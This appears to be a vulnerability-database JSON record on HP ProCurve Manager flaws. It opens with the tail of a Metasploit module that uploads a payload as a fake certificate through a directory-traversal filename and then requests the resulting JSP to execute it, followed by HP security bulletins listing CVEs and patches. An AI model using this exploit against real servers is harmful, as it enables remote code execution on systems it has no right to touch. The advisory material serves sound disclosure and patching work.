and res.code == 200 and res.body =~ /\"success\":\"true\"/\n return Exploit::CheckCode::Appears\n end\n\n return Exploit::CheckCode::Safe\n end\n\n def get_session\n res = send_request_cgi({ 'uri' => \"/RegWeb/html/snac/index.html\" })\n session = nil\n if res and res.code == 200\n session = res.get_cookies\n end\n\n if session and not session.empty?\n return session\n end\n\n return nil\n end\n\n def exploit_upload(session)\n jsp_name = \"#{rand_text_alphanumeric(8+rand(8))}.jsp\"\n rand_password = rand_text_alpha(4 + rand(10))\n post_message = Rex::MIME::Message.new\n post_message.add_part(payload.encoded, \"application/x-pkcs12\", nil, \"form-data; name=\\\"importFile\\\"; filename=\\\"\\\\../#{jsp_name}\\\"\")\n post_message.add_part(rand_password, nil, nil, \"form-data; name=\\\"importPasswd\\\"\")\n post_message.add_part(\"{\\\"importPasswd\\\":\\\"#{rand_password}\\\"}\", nil, nil, \"form-data; name=\\\"cert_data\\\"\")\n post_message.add_part(\"importCertificate\", nil, nil, \"form-data; name=\\\"cert_action\\\"\")\n data = post_message.to_s\n\n res = send_request_cgi(\n {\n 'uri' => \"/RegWeb/RegWeb/UpdateCertificatesServlet\",\n 'method' => 'POST',\n 'ctype' => \"multipart/form-data; boundary=#{post_message.bound}\",\n 'cookie' => session,\n 'data' => data,\n })\n\n if res and res.code == 200 and res.body =~ /Certificate import fails/\n return jsp_name\n end\n\n return nil\n end\n\n def exploit\n print_status(\"Getting a valid session...\")\n session = get_session\n if session.nil?\n fail_with(Failure::NoTarget, \"#{peer} - Failed to get a valid session\")\n end\n\n print_status(\"Uploading payload...\")\n jsp = exploit_upload(session)\n unless jsp\n fail_with(Failure::NotVulnerable, \"#{peer} - Upload failed\")\n end\n\n print_status(\"Executing payload...\")\n send_request_cgi({ 'uri' => \"/RegWeb/#{jsp}\" })\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/hp_pcm_snac_update_certificates.rb"}], "securityvulns": [{"lastseen": "2018-08-31T11:09:52", "bulletinFamily": "software", "description": "Code execution, session reusage, SQL injection.", "modified": "2013-09-11T00:00:00", "published": "2013-09-11T00:00:00", "id": "SECURITYVULNS:VULN:13282", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13282", "title": "HP ProCurve Manager, HP Identity Driven Manager multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:54", "bulletinFamily": "software", "description": "Crossite scripting, code execution.", "modified": "2014-01-08T00:00:00", "published": "2014-01-08T00:00:00", "id": "SECURITYVULNS:VULN:13501", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13501", "title": "HP ProCurve Manager multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:49", "bulletinFamily": "software", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c03897409\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c03897409\r\nVersion: 1\r\n\r\nHPSBPV02918 rev.1 - HP ProCurve Manager (PCM), HP PCM+ and HP Identity Driven\r\nManager (IDM), SQL Injection, Remote Code Execution, Session Reuse\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2013-09-09\r\nLast Updated: 2013-09-09\r\n\r\nPotential Security Impact: SQL injection, remote code execution, session\r\nreuse\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nPotential security vulnerabilities have been identified with HP ProCurve\r\nManager (PCM), HP PCM+ and HP Identity Driven Manager (IDM). These\r\nvulnerabilities could be exploited remotely to allow SQL injection, remote\r\ncode execution and session reuse.\r\n\r\nReferences: CVE-2005-2572 (SSRT101272)\r\nCVE-2013-4809 (ZDI-CAN-1744, SSRT101132)\r\nCVE-2013-4810 (ZDI-CAN-1760, SSRT101127)\r\nCVE-2013-4811 (ZDI-CAN-1743, SSRT101116)\r\nCVE-2013-4812 (ZDI-CAN-1742, SSRT101115)\r\nCVE-2013-4813 (ZDI-CAN-1745, SSRT101129)\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP ProCurve Manager (PCM) v3.20, v4.0\r\nHP PCM+ v3.20, v4.0\r\nHP Identity Driven Manager (IDM) v4.0\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2013-4809 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10\r\nCVE-2013-4810 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10\r\nCVE-2013-4811 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10\r\nCVE-2013-4812 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10\r\nCVE-2013-4813 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10\r\nCVE-2005-2572 (AV:N/AC:M/Au:S/C:C/I:C/A:C) 8.5\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nThe Hewlett-Packard Company thanks Andrea Micalizzi aka rgod for working with\r\nHP's Zero Day Initiative to report CVE-2013-4809, CVE-2013-4810,\r\nCVE-2013-4811, CVE-2013-4812 and CVE-2013-4813 to security-alert@hp.com\r\n\r\nRESOLUTION\r\n\r\nHP has provided updated software to resolve these issues. Please used the\r\nAutoUpdate feature of PCM. Product and Potential Vulnerability\r\n Resolution\r\n HP Branded Products Impacted\r\n\r\nHP IDM v4.00 (CVE-2013-4809, CVE-2013-4810, CVE-2013-4811, CVE-2013-4812)\r\n HP PCM v4.00 AutoUpdate #6 04.00.06.628\r\n J9752A HP PCM+ Identity Driven Manager v4 Software Module with 500-user\r\nLicense\r\n\r\nJ9753A HP PCM+ Identity Driven Manager v4 Software Module with Unlimited-user\r\nLicense\r\n\r\nHP PCM v3.20, HP PCM v4.00 (CVE-2013-4813)\r\n HP PCM v4.00 AutoUpdate #5 04.00.05.612\r\n\r\nHP PCM v3.20 AutoUpdate #8 C.03.20.1741\r\n J9755A HP PCM+ v4 Software Platform with 50-device License\r\n\r\nJ9757A HP PCM+ v4 Software Platform with Unlimited-device License\r\n\r\nJ9173A HP ProCurve Manager Plus 3.0 50 device license upgrade\r\n\r\nJ9174A HP ProCurve Manager Plus 3.0 software with 50 device license\r\n\r\nJ9176A HP ProCurve Manager Plus 3.0 unlimited device license upgrade\r\n\r\nJ9177A HP ProCurve Manager Plus 3.0 software with unlimited device license\r\n\r\nHP PCM v4.00 ( CVE-2005-2572)\r\n HP PCM v4.00 AutoUpdate #5 04.00.05.612\r\n J9755A HP PCM+ v4 Software Platform with 50-device License\r\n\r\nJ9757A HP PCM+ v4 Software Platform with Unlimited-device License\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 9 September 2013 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2013 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits;damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (GNU/Linux)\r\n\r\niEYEARECAAYFAlIuBgcACgkQ4B86/C0qfVlvcwCggBleIQ2jJ5kVsOs0jnnfN0nJ\r\njqkAnjs4Po+SPJx4rm+WXolFai2juOmy\r\n=5yU4\r\n-----END PGP SIGNATURE-----\r\n\r\n", "modified": "2013-09-11T00:00:00", "published": "2013-09-11T00:00:00", "id": "SECURITYVULNS:DOC:29808", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29808", "title": "[security bulletin] HPSBPV02918 rev.1 - HP ProCurve Manager (PCM), HP PCM+ and HP Identity Driven Manager (IDM), SQL Injection, Remote Code Execution, Session Reuse", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:50", "bulletinFamily": "software", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c03897409\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c03897409\r\nVersion: 2\r\n\r\nHPSBPV02918 rev.2 - HP ProCurve Manager (PCM), HP PCM+ and HP Identity Driven\r\nManager (IDM), SQL Injection, Remote Code Execution, Session Reuse\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2013-10-15\r\nLast Updated: 2013-10-15\r\n\r\nPotential Security Impact: SQL injection, remote code execution, session\r\nreuse\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nPotential security vulnerabilities have been identified with HP ProCurve\r\nManager (PCM), HP PCM+ and HP Identity Driven Manager (IDM). These\r\nvulnerabilities could be exploited remotely to allow SQL injection, remote\r\ncode execution and session reuse.\r\n\r\nReferences: CVE-2005-2572 (SSRT101272)\r\nCVE-2013-4809 (ZDI-CAN-1744, SSRT101132)\r\nCVE-2013-4810 (ZDI-CAN-1760, SSRT101127)\r\nCVE-2013-4811 (ZDI-CAN-1743, SSRT101116)\r\nCVE-2013-4812 (ZDI-CAN-1742, SSRT101115)\r\nCVE-2013-4813 (ZDI-CAN-1745, SSRT101129)\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP ProCurve Manager (PCM) v3.x, v3.20, v4.0\r\nHP PCM+ v3.20, v4.0\r\nHP Identity Driven Manager (IDM) v4.0\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2013-4809 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10\r\nCVE-2013-4810 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10\r\nCVE-2013-4811 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10\r\nCVE-2013-4812 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10\r\nCVE-2013-4813 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10\r\nCVE-2005-2572 (AV:N/AC:M/Au:S/C:C/I:C/A:C) 8.5\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nThe Hewlett-Packard Company thanks Andrea Micalizzi aka rgod for working with\r\nHP's Zero Day Initiative to report CVE-2013-4809, CVE-2013-4810,\r\nCVE-2013-4811, CVE-2013-4812 and CVE-2013-4813 to security-alert@hp.com\r\n\r\nRESOLUTION\r\n\r\nHP has provided updated software to resolve these issues. Please used the\r\nAutoUpdate feature of PCM.\r\n\r\nNote about CVE-2005-2572 and PCM v3.X: To address CVE-2005-2572 on PCMv3, a\r\nseparate security tool must be run. This security tool can be found as\r\nfollows. Browse to the HP Networking Support Lookup Tool\r\nhttp://www.hp.com/networking/support :\r\n\r\nEnter a PCM v3.x product number, such as J9173A, J9174A, J9175A, or J9176A\r\ninto the "Auto Search" text box\r\nCheck the appropriate product\r\nPress "Display Selected"\r\nClick "Software Downloads"\r\nIn the "Other" section, there will be a "Security Tools" download which\r\ncontains a zip file with several executables.\r\nTo protect your PCM v3.x installation, use the pcm320-DB-restrict tool. There\r\nare 32bit and 64bit versions available. Please read the release notes\r\nincluded in the Security Tool download.\r\nIMPORTANT: If you will be updating a protected PCM v3 installation to PCM v4,\r\nyou will need to run the pcm320-DB-unrestrict utility prior to updating.\r\n\r\nProduct and Potential Vulnerability\r\n Resolution\r\n HP Branded Products Impacted\r\n\r\nHP IDM v4.00 (CVE-2013-4809, CVE-2013-4810, CVE-2013-4811, CVE-2013-4812)\r\n HP PCM v4.00 AutoUpdate #6 04.00.06.628\r\n J9752A HP PCM+ Identity Driven Manager v4 Software Module with 500-user\r\nLicense\r\n\r\nJ9753A HP PCM+ Identity Driven Manager v4 Software Module with Unlimited-user\r\nLicense\r\n\r\nHP PCM v3.20, HP PCM v4.00 (CVE-2013-4813)\r\n HP PCM v4.00 AutoUpdate #5 04.00.05.612\r\n\r\nHP PCM v3.20 AutoUpdate #8 C.03.20.1741\r\n J9755A HP PCM+ v4 Software Platform with 50-device License\r\n\r\nJ9757A HP PCM+ v4 Software Platform with Unlimited-device License\r\n\r\nJ9173A HP ProCurve Manager Plus 3.0 50 device license upgrade\r\n\r\nJ9174A HP ProCurve Manager Plus 3.0 software with 50 device license\r\n\r\nJ9176A HP ProCurve Manager Plus 3.0 unlimited device license upgrade\r\n\r\nJ9177A HP ProCurve Manager Plus 3.0 software with unlimited device license\r\n\r\nHP PCM v4.00 ( CVE-2005-2572)\r\n HP PCM v4.00 AutoUpdate #5 04.00.05.612\r\n J9755A HP PCM+ v4 Software Platform with 50-device License\r\n\r\nJ9757A HP PCM+ v4 Software Platform with Unlimited-device License\r\n\r\nHP PCM v3.x ( CVE-2005-2572)\r\n HP PCM v3.x see Resolution text above.\r\n J9173A HP ProCurve Manager Plus 3.0 50 device license upgrade\r\n\r\nJ9174A HP ProCurve Manager Plus 3.0 software with 50 device license\r\n\r\nJ9176A HP ProCurve Manager Plus 3.0 unlimited device license upgrade\r\n\r\nJ9177A HP ProCurve Manager Plus 3.0 software with unlimited device license\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 9 September 2013 Initial release\r\nVersion:2 (rev.2) - 15 October 2013 Added PCM v3\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2013 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits;damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (GNU/Linux)\r\n\r\niEYEARECAAYFAlJdvz4ACgkQ4B86/C0qfVmLhwCghN6a1Opqqcbd3dLqlnnfQWci\r\nUR8AoIhyX+Ht4By5+4v503IdvTZKcaWg\r\n=3nFW\r\n-----END PGP SIGNATURE-----\r\n", "modified": "2014-01-08T00:00:00", "published": "2014-01-08T00:00:00", "id": "SECURITYVULNS:DOC:30182", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30182", "title": "[security bulletin] HPSBPV02918 rev.2 - HP ProCurve Manager (PCM), HP PCM+ and HP Identity Driven Manager (IDM), SQL Injection, Remote Code Execution, Session Reuse", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
